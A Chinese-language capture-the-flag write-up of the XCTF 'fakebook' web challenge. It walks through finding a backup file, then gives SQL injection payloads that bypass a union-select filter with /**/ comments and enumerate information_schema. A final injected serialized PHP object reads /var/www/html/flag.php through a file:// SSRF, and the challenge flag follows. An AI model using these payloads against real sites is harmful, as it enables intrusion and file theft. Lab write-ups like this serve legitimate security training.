攻防世界-web-fakebook

 

打开网页，只有注册和登录选项，

先看看robots.txt有什么

直接下载一个user.php.bak文件，打开分析

 设定了姓名，年龄，博客，博客地址利用了正则表达式

其实也没有https://无所谓 

 选择join选项

 join成功

 

点开admin

发现?no=1,进行注入点测试

显示有注入点 ，用order by 测试到4为止可以访问，存在四列

order by 4#

 查看数据库，发现union select被过滤了，/**/可以绕过waf，获取到数据库

/**/union/**/select 1,group_concat(schema_name),3,4 from information_schema.schemata #

数据库名fakebook,information_schema,mysql,performance_schema,test 

获取数据表名

/**/union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema="fakebook"#

只有一个users 

读取字段

/**/union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema="fakebook"#

获得data里面的数据

 /**/union/**/select 1,group_concat(data),3,4 from users#

 数据被序列化

 瞬间没了思路，随便输入一个flag.php试试

存在这样的php文件，只是没法读取内容，利用file进行内容读取【file:///文件路径（ssrf）】 

 /**/union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:3:"aaa";s:3:"age";i:14;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'#

查看源代码 

 点击蓝色

找到flag

flag{c1e552fdf77049fabf65168f22f7aeab}